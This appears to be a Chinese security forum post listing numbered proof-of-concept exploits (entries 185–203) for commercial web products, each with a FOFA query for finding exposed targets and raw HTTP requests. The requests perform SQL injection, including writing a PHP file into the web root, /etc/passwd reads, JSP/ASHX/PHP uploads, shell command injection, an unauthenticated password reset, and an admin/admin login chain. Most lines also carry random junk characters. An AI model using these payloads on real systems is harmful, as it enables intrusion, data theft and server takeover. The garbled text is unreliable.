- \9 M( k5 H( F2 t' h, @0 @: o+ V# q/ E
185. 瑞友天翼应用虚拟化系统SQL注入( z6 p3 d! s3 S7 ?
version < 7.0.5.1
, C0 H, P4 s/ h% B& QFOFA:app="REALOR-天翼应用虚拟化系统": ?6 p3 H; S* s0 { s% ~; ?
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1! L( \! w- B8 j8 }) g
Host: host, @3 r- t1 ]2 S1 A& x" u/ ]
; @5 L1 h& N/ P/ M6 w
" D5 N$ H" b5 l/ }5 k$ ?0 V
186. F-logic DataCube3 SQL注入
. l6 A5 F8 T3 |4 Y6 W2 J( pCVE-2024-317502 T+ W- X, M3 [
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统% a/ m" G7 C' K3 D. u' O
FOFA:title=="DataCube3"+ B$ U$ |7 t2 c5 g1 |
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
) z, C- ^; \1 |4 C4 q: K5 SHost: your-ip
: |8 G! A! _7 w. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
5 q0 M9 }$ p+ a5 |$ o- {" [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.87 Y/ o7 @9 x0 L, c% |, L$ q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, |4 Q ]1 C' N: s& W1 MAccept-Encoding: gzip, deflate
& P' ]3 |9 [( [: Z7 t& `" m8 T$ PConnection: close
4 A3 g5 j0 Z8 }Content-Type: application/x-www-form-urlencoded. C* Y* R) Q/ @ v; ^% F
6 S8 M$ p2 t4 Freq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14506 g; v0 L& i; E
% ^' i$ j6 N$ T# y t9 `$ j2 ^+ x \6 f6 h2 Q
187. Mura CMS processAsyncObject SQL注入
" B- w: ?6 z" SCVE-2024-32640
' [; C' p9 y# h9 `FOFA:"Mura CMS"
8 |/ O5 h- {: U3 Y) L% Y- G8 iPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 b5 L5 |. G' w* ]3 |* ~Host: your-ip! s3 R7 q, j; s2 h1 G+ z
Content-Type: application/x-www-form-urlencoded
W- {( T8 x/ a8 W2 r8 @. V) m' o- d; _& R; ]' J. P1 \+ D
X* x, G5 q# j6 l
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 z2 z) U: v' @& ^" T2 O! w4 y+ n
& ~ T9 J* {" m6 r
% c* ]6 z+ Y# V& I0 z
188. 叁体-佳会视频会议 attachment 任意文件读取1 E% b b* R7 G
version <= 3.9.7
) {! Z/ }" s: D6 cFOFA:body="/system/get_rtc_user_defined_info?site_id"
5 D% A! u" |" j" RGET /attachment?file=/etc/passwd HTTP/1.1. u) l$ S9 Y# e; a Z7 v3 G
Host: your-ip
% [& w! l% y) h: R0 R6 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 Z; G( O% @) P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 B$ z9 ?0 u+ T3 ^7 F4 R0 V
Accept-Encoding: gzip, deflate
8 ?* F0 \' _- Q; }) e LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 A* a- m& e$ X2 {0 G" g, S ? oConnection: close2 N% m! L& [. W0 g B- Z
$ j& ?$ _: ]/ n) {
( B) v1 j2 n9 N! _189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" h1 H' y: z" P" b. x [ k& lFOFA:app="LANWON-临床浏览系统"/ A1 E" }5 h. |+ Z$ T
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
7 _$ X: [" G$ RHost: your-ip
. V2 i; G6 |" ~$ ^" A2 S0 ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 m7 R: k5 W5 `0 w& s* y. aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, w2 G! @" R6 J1 E f( _* I; Q( qAccept-Encoding: gzip, deflate
* B% _, k9 w0 H8 S4 ZAccept-Language: zh-CN,zh;q=0.9
. [) s9 `: L. ^- Z7 vConnection: close
7 t9 D( k, `; ^* O$ J6 h# _& m8 Q, f9 T1 I6 I v
2 M- q0 d3 G: ?- @' D* h, c
190. 短视频矩阵营销系统 poihuoqu 任意文件读取0 Z6 r, a7 f# m# h) e5 z
FOFA:title=="短视频矩阵营销系统"
8 R# J+ L0 e. ~8 {$ kPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
. C) }3 q& B+ X4 G& SHost: your-ip
7 j+ R, x9 \- S4 S. LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36. x1 P$ Q+ R; Z, U' Y0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 C) O% [2 z8 L5 B0 U
Content-Type: application/x-www-form-urlencoded
7 R l0 C9 O6 F& s# L6 dAccept-Encoding: gzip, deflate$ m9 P6 ?4 C x( b" Y0 f
Accept-Language: zh-CN,zh;q=0.9
, s$ Q/ g3 J1 v2 y
. c" z/ ?5 E' Q/ J" Zpoi=file:///etc/passwd; ^+ @4 {2 @9 a4 ?+ w7 i6 I
0 H7 s+ B# U. c: b0 s" Y; o! D
( w7 Z- A0 ?" ^4 [1 X! T% G191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
1 @, v" R" v0 s7 C) Z; V% t. C9 N% \FOFA:body="/CDGServer3/index.jsp"+ m& U$ D+ c! e+ I' t" s
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
8 R0 k: s. ^2 Z7 f/ Q8 cHost: your-ip3 J* d: H6 m, F# S9 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 G& M A3 ? ~& K& l( H) q
Content-Type: application/x-www-form-urlencoded
' d, u% }0 s3 `6 I
, k1 o+ r1 D) Y1 Y/ }2 Rcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
3 t" t, c) _4 Z
, L, p2 n$ h/ Z
5 Z* S. e5 E( H' K192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, b3 f5 q: [, L4 K
FOFA:title="用户登录_富通天下外贸ERP"
. z% ?& J# v# a" D; jPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
& m2 H" v0 T' JHost: your-ip
' F' b( K2 g$ W, \% x! C( N$ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- ~! F, ?! I0 g1 _) ~+ R7 J4 S& `Content-Type: application/x-www-form-urlencoded3 W5 r9 f3 R+ A5 y$ G+ I1 A
m; B O1 A$ U p: T X
9 k6 n* z. ]; B( q, e" r8 I8 ~2 z<% @ webhandler language="C#" class="AverageHandler" %>6 @% Q& S8 \! h; U, k! U
using System;) N) l& N3 Y7 v. I
using System.Web;9 R: D) V* `) u3 u1 h# L% E
public class AverageHandler : IHttpHandler
$ W$ i r7 ^ g. S# B/ \( u{
* ^$ n$ F9 P# c/ Qpublic bool IsReusable
# ]& ~& U2 O* f" f b$ Z0 ?3 d{ get { return true; } }+ z8 t% [% \! W2 M+ c- {
public void ProcessRequest(HttpContext ctx)
/ {: Q& m+ V. g2 T' w. N, Z' X{! V* x3 N& d3 \1 a. P" W- f
ctx.Response.Write("test");) p6 f5 o- I, T" Y
}) ]6 b4 l, o% _; K* a( p N
}
A! \5 g5 M" X$ t; y% s4 d
6 t i" |3 i' O2 P0 Z: x+ q6 o' O$ [- D$ M9 Q2 @+ Z# {1 R
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, z% B5 R1 m- C9 s' zFOFA:body="山石云鉴主机安全管理系统"
. L! R& B1 M$ ^# b+ \8 G5 mGET /master/ajaxActions/getTokenAction.php HTTP/1.1% [2 V# w* ^/ }+ e$ ]) ^# d
Host:
, R3 V$ `0 }' Y0 SCookie: PHPSESSID=2333333333333;
5 d N/ F q; P( i) ~Content-Type: application/x-www-form-urlencoded+ G' \8 J1 Q/ O: X. _2 w$ L
User-Agent: Mozilla/5.0. A5 g0 r6 A0 W2 D
2 f* c5 u! a' n4 W/ @/ U0 L
2 n- |% p' } G, J) T2 wPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
( |$ R- ?8 t" w/ t0 l7 wHost:
* f X0 |5 k( ]: [ DUser-Agent: Mozilla/5.06 H: g3 L2 G2 Y. p/ ?! u+ x# ~
Accept-Encoding: gzip, deflate
* |6 A1 h3 ?# BAccept: */*
5 f) d% P+ k# L4 N0 \1 \1 JConnection: close. i! n7 c3 A- y
Cookie: PHPSESSID=2333333333333;
7 F T c: u9 t+ {2 B! TContent-Type: application/x-www-form-urlencoded
& X$ m4 @5 \, E8 KContent-Length: 84/ X: Y. A- F$ s% Y X' k( F
- t8 `% b5 O) K) n5 k% ~" x s
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; x7 Z0 w- }( D0 P. j6 t) D/ U6 D, |
: y, E# G: i2 a; \8 S Q2 L0 _4 F! y; {( ~' m
GET /master/img/config HTTP/1.1
( M/ m0 B4 Q, ]. p) ZHost:
$ k& k& v, t. c' C8 x* jUser-Agent: Mozilla/5.0* }; A0 I- d$ G0 n$ `$ B- N9 i
1 J, D+ c( B& `6 N
% w# P2 o5 h- ^194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
- J) x6 G. e" B" ^FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在: _7 J5 v) a- Z: W: v
! L% P; K# ]) v" T: y
POST /servlet/uploadAttachmentServlet HTTP/1.1
- m. v8 V+ d) u, T6 B @ G; w+ RHost: host
; |) Z0 o" `) t" N7 k9 U2 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36: L' F* D9 z6 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 ~9 C' {! Z0 n: P6 u H8 d8 d/ ~- P BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& z4 o, H' J2 o4 E/ I/ ?6 YAccept-Encoding: gzip, deflate
$ X. ]3 L. ?3 g8 G4 i1 y. TConnection: close7 j! s+ t& [, a6 J# |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
& x% \. s+ v0 _------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 i4 n* A) x# }
' t+ v/ ]' J2 ?3 ?! T2 l; _% @, MContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
6 E& Z, K- B! }6 S" hContent-Type: text/plain$ Q) Y" |- {2 {
<% out.println("hello");%>+ K, a* z$ l2 {, t
------WebKitFormBoundaryKNt0t4vBe8cX9rZk& O3 m+ {& q) Q9 N! h8 I4 m3 ~
Content-Disposition: form-data; name="json": U! p, h1 Q; V
{"iq":{"query":{"UpdateType":"mail"}}}( A) |$ N6 m4 r4 w" u. B; i9 t" F9 _
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
7 n2 n# N6 o: V0 u k
: b& B1 j- i1 M" j9 M
9 }3 B( ^8 C: ~/ }8 {7 A% T195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 `) o1 c, @" {& |
FOFA:title=="飞鱼星企业级智能上网行为管理系统
6 Y- x7 i9 g. Y3 f' zPOST /send_order.cgi?parameter=operation HTTP/1.1
4 @* i- `+ K! R# F3 FHost: 127.0.0.1
5 u- }9 x- u# q1 LPragma: no-cache3 Z" Q& G+ t2 c% f, j
Cache-Control: no-cache! B! B# l4 `- l. D9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- e0 K/ `& v% Q6 Y# w) a' n
Accept: */*, f9 u* k; l" l4 e( E- \& j* l+ [, p
Accept-Encoding: gzip, deflate
/ ] d9 T# q8 ?1 ? H) eAccept-Language: zh-CN,zh;q=0.9
8 M. j% ~9 T5 @. A5 e& o. KConnection: close
8 L: R0 C5 X$ t7 o$ CContent-Type: application/x-www-form-urlencoded% G+ P) {1 _( ] w) K
Content-Length: 68
- U# E) A' R! b- b1 X3 b, J1 y7 V( l" {" r0 f& O2 H4 o
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
- J f' {% O; H; y+ ]2 [& }3 y, n; Z/ r" ?+ K. k- @7 |: k2 o
! w9 _& b8 E; D! k: Y6 f* P8 p+ H- t
196. 河南省风速科技统一认证平台密码重置
5 Q0 r6 R; p) E% q( {2 E) T% U$ JFOFA:body="/cas/themes/zbvc/js/jquery.min.js"4 s- C$ c2 S$ T+ y9 T4 x
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
/ f9 V& b9 t z) x7 x/ ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& A" B9 _5 Y8 F: E' ?8 Y1 E$ v# p. NContent-Type: application/json;charset=UTF-8
" |2 L, ]) [0 q% s/ e8 W" lX-Requested-With: XMLHttpRequest [9 d2 \5 e4 o: h
Host:" ^2 T& } O2 S2 ~8 N
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.27 Q0 e' `, M3 L6 \
Content-Length: 45
& Z9 y5 t% W' W8 C7 c+ E0 AConnection: close
- L# t: Q. T; ?. s' C; e+ e1 @, O9 M% W2 w8 k% I, F0 G, x2 L7 M
{"xgh":"test","newPass":"test666","email":""}
V. c3 M ]; w( ~' j- W
& k6 \; ?* Y. p6 [1 H- s
/ N: i1 S/ k$ X9 z" i: n' }! j; n I3 }3 }
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入! `! e S. A6 S$ f
FOFA:app="浙大恩特客户资源管理系统"
4 y0 u" S n6 n, NGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) S b: a7 [: I
Host:3 U% L$ r+ W; K; q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
& f0 M4 g7 k: g2 B. ~Accept-Encoding: gzip, deflate* X5 G. L- Y" ^
Connection: close
- I! B, i) ?9 b+ M# q1 l& Y4 f7 { K, O; C0 W
/ z. z/ G+ O+ ?. b7 @+ a% ^$ k* |5 @+ Y" ~- h7 p) s
198. 阿里云盘 WebDAV 命令注入; W) v$ @; Z E" m) T& y" H
CVE-2024-296405 p) @/ k. j. |) T
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1/ O! _0 W+ ]- h; ^
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64) \% A6 o8 S4 j2 K
Accept: */* U6 j: D) p& n) D3 C% C3 j
Accept-Encoding: gzip, deflate7 T( R# r( S/ j! w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) \ Y) E0 F$ o/ jConnection: close
- ?+ d& w9 e, ^. z( ?" W( H. I K/ h" @% |2 [
' d( \% t O- h. W: _
199. cockpit系统assetsmanager_upload接口 文件上传
: {) A+ L, [: l, u1 B$ `1 r' e/ Q+ S1 ~/ [; B E& {8 D
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
: a% B2 w, o) b! _& h* WGET /auth/login?to=/ HTTP/1.1! `6 L: G5 O( c& l4 A6 \4 b
% ^, K4 n" d7 o- d) e8 p
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"( N/ e( n; r' Y% _6 M' r I
, y$ l+ m6 Z% ]' P$ L1 b2.使用刚才上一步获取到的jwt获取cookie: i* ~% G. @5 o/ b
4 [- Z* \2 {0 T: `% {; Y W
POST /auth/check HTTP/1.1% V: `7 i; @8 M$ q* j/ l
Content-Type: application/json% v I2 T. w* {" Y+ ~
y1 \* A' }/ L& X{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
8 X+ `1 d3 y4 e) E
5 j- o6 |9 g$ I) a" r; G/ W响应:200,返回值:9 L3 e' I2 a& e/ E. R# F! j
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/- K8 ~6 T! ^$ T/ x5 N. U8 [1 g' L
Fofa:title="Authenticate Please!"8 S0 o: p( T: z7 y' J
POST /assetsmanager/upload HTTP/1.1: F( t- [$ ^! U* n. v4 j
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
7 M% ~+ g: I+ O% M" t- v* SCookie: mysession=95524f01e238bf51bb60d77ede3bea92/ C4 c2 K+ \. b: u) A
& `1 K- T7 Q5 |. Z
-----------------------------36D28FBc36bd6feE7Fb3
- I5 I9 A, J: f2 U# TContent-Disposition: form-data; name="files[]"; filename="tttt.php"
% A2 R6 j w) zContent-Type: text/php
. G# H# q0 C/ q# Z4 b8 j; Z- Z% U5 f$ f; A; ]3 N/ `
<?php echo "tttt";unlink(__FILE__);?> ]0 r$ O, q+ t$ K- V
-----------------------------36D28FBc36bd6feE7Fb3
, G9 G' H2 }$ b8 e+ AContent-Disposition: form-data; name="folder"
1 T, w+ L) `+ c) N' {/ A' j* k3 V+ k6 C7 i2 }1 q. C5 R* E. q
-----------------------------36D28FBc36bd6feE7Fb3--
; t& b3 V6 x( c2 L! f R; d: h0 \
$ R- k5 r# g9 o' v p1 O/storage/uploads/tttt.php) Q, X# \# a& x2 h. f
7 n+ Q. n% t' M" j' w
200. SeaCMS海洋影视管理系统dmku SQL注入4 P# f M! a1 z4 a+ ~$ E+ O' R) P
FOFA:app="海洋CMS"
G3 c, }* ^4 G4 SGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
: B( s4 W0 p# \' a }; `Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s/ @- @7 F4 b- ~7 O$ y; [" ?2 H
Upgrade-Insecure-Requests: 1& s2 h# t4 a# r8 i# C* f8 ~ X
Cache-Control: max-age=0' f: y# ]# t( a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% \3 L- a3 o! t/ {' q Y
Accept-Encoding: gzip, deflate5 S) H! N! t- C( t! ?8 B+ A
Accept-Language: zh-CN,zh;q=0.9
1 r7 ]1 l% ?. p2 I1 e7 [7 |5 U" H
+ n1 t8 I1 Q6 C: C* y" T
* L$ U8 L1 c- N; Y# ?) D201. 方正全媒体新闻采编系统 binary SQL注入
3 @% }5 y- x# c* ^" `* PFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"" ?5 A. T. U" e8 z0 H6 l
POST /newsedit/newsplan/task/binary.do HTTP/1.15 J; y- }5 T4 `! l' k6 O+ v
Content-Type: application/x-www-form-urlencoded
+ L% g( D9 N- i- U# vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, j# U8 L! E' m D/ t, |5 d- EAccept-Encoding: gzip, deflate
8 V+ X% b5 q, e- m \$ tAccept-Language: zh-CN,zh;q=0.97 n- `3 E4 C- u* y! j4 q2 m! R
Connection: close
1 x9 D u! W0 }" d3 G) s; K! g! q) X; \6 _# E* X2 }
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1+ F% y% G( q& N: w) P' m5 }
. q6 b; t1 H! u+ U+ ` U# s
4 C. _5 \7 R9 r3 s202. 微擎系统 AccountEdit任意文件上传
) k( S, V% i7 Q) T, cFOFA:body="/Widgets/WidgetCollection/"4 L7 C( ] }0 r. I/ N" F
获取__VIEWSTATE和__EVENTVALIDATION值
. s" x6 N# O& X1 s3 M) bGET /User/AccountEdit.aspx HTTP/1.1$ i8 M D+ {; P7 s9 L
Host: 滑板人之家
* {6 b( R7 G) vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.312 I+ j. @$ m( B3 I5 F4 H0 n. {& O
Content-Length: 0) A9 n$ |( c* {$ O) g b
1 H6 I. `" w* n" _2 \7 c2 \& Q8 e' V2 t& I2 n; z
替换__VIEWSTATE和__EVENTVALIDATION值
# c* q" q% [ g4 e- Y/ r1 {6 ^& EPOST /User/AccountEdit.aspx HTTP/1.1) x$ p7 f& U" z& K% E5 I! L
Accept-Encoding: gzip, deflate, br, k! A' N! P1 |& G l
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687. A. h" ~) \9 H! |8 S
$ I" t' g \. u @9 a4 \7 T-----------------------------786435874t385875938657365873465673587356878 o4 V1 [5 A* b
Content-Disposition: form-data; name="__VIEWSTATE"
8 M% C" H. `9 u/ I. V- C3 ~; R+ F3 Z& w+ ]
__VIEWSTATE% J4 Y8 y% g2 _& p: E" o' u
-----------------------------786435874t38587593865736587346567358735687
- ^! p. ^2 Y: y* I0 Y2 v$ C' AContent-Disposition: form-data; name="__EVENTVALIDATION"
$ t' l0 L# f4 J9 F7 g i- o, s' q4 ]) H9 Y; {9 @0 M( T
__EVENTVALIDATION# P, T# i' p0 g& q- s0 w% ~
-----------------------------786435874t38587593865736587346567358735687
( @0 P( T O4 u/ C$ \Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"9 _6 u B9 m$ v; f) X* u
Content-Type: text/plain. m w! n3 l! c) z
5 i5 o0 a0 k4 J8 Z: m5 e8 K
Hello World!7 T t/ E3 y" v3 @0 k
-----------------------------786435874t38587593865736587346567358735687
; d8 F" P4 M7 JContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"1 k% ]3 r. F% r! E1 u2 ^
! V* p7 O( }5 F+ N$ G. ^+ T7 r上传图片
( ^$ w1 v9 p6 |. e$ ]-----------------------------786435874t38587593865736587346567358735687
4 X" [# i3 p0 mContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"9 U8 a+ v; C" {# r' O- r
" g0 b. C( j: V# E
8 \; m1 p% B. t4 K- o% b! b
-----------------------------786435874t38587593865736587346567358735687) ^5 F6 B8 _+ X4 y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
& Z; a5 ^/ o$ O$ j7 r5 e( q) j5 R( l& p u( O& N
+ N. B) K; r5 n: s-----------------------------786435874t38587593865736587346567358735687--1 K" j" [: ]5 ]7 ?9 k
1 s8 U& I; W+ E4 D0 |4 _4 ]# \. h# M0 n8 \$ l, G
/_data/Uploads/1123.txt( w" N5 H+ k/ U/ Y
3 f7 f( s+ R& h& k' w! J
203. 红海云EHR PtFjk 文件上传
/ W' J+ ?, J3 ?6 E4 I7 `; FFOFA:body="RedseaPlatform"5 j) W w. v; U
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
. X! r7 c/ e. v7 S/ V' NHost: x.x.x.x3 B6 Y, Z* d( A) b) M
Accept-Encoding: gzip0 a6 E7 d$ b- S( X3 V2 X l' M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# O1 B3 C h! G. r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
. |! d9 {0 O2 k7 K* P6 [( PContent-Length: 2108 E' v1 f7 T# n0 w5 [- Y; T
% x% ^, F( M* V$ D- u, {- E- o \. L
------WebKitFormBoundaryt7WbDl1tXogoZys4
# `! o, f' t% w. p2 CContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
* h+ S. y& A, gContent-Type:image/jpeg& Z9 V. q, t4 ^$ O
# y/ w% o4 g+ m, {5 t
<% out.print("hello,eHR");%>1 q7 f7 v) x8 a' X, A
------WebKitFormBoundaryt7WbDl1tXogoZys4--
. g' v9 |4 F8 j! H, R0 F( ]5 V. B0 k3 Y" }
& g1 Z4 D |6 h0 }3 N" e1 W# i
% A. ?; K4 }, w; f
- {6 T$ Y; d' e* g! Z) o# l; J( M Z/ y6 r0 |* E. Q+ l. Q
" ^( E) q* B4 r8 U0 e2 k6 a
|
发表于 2024-6-5 14:31:29
收藏
支持
反对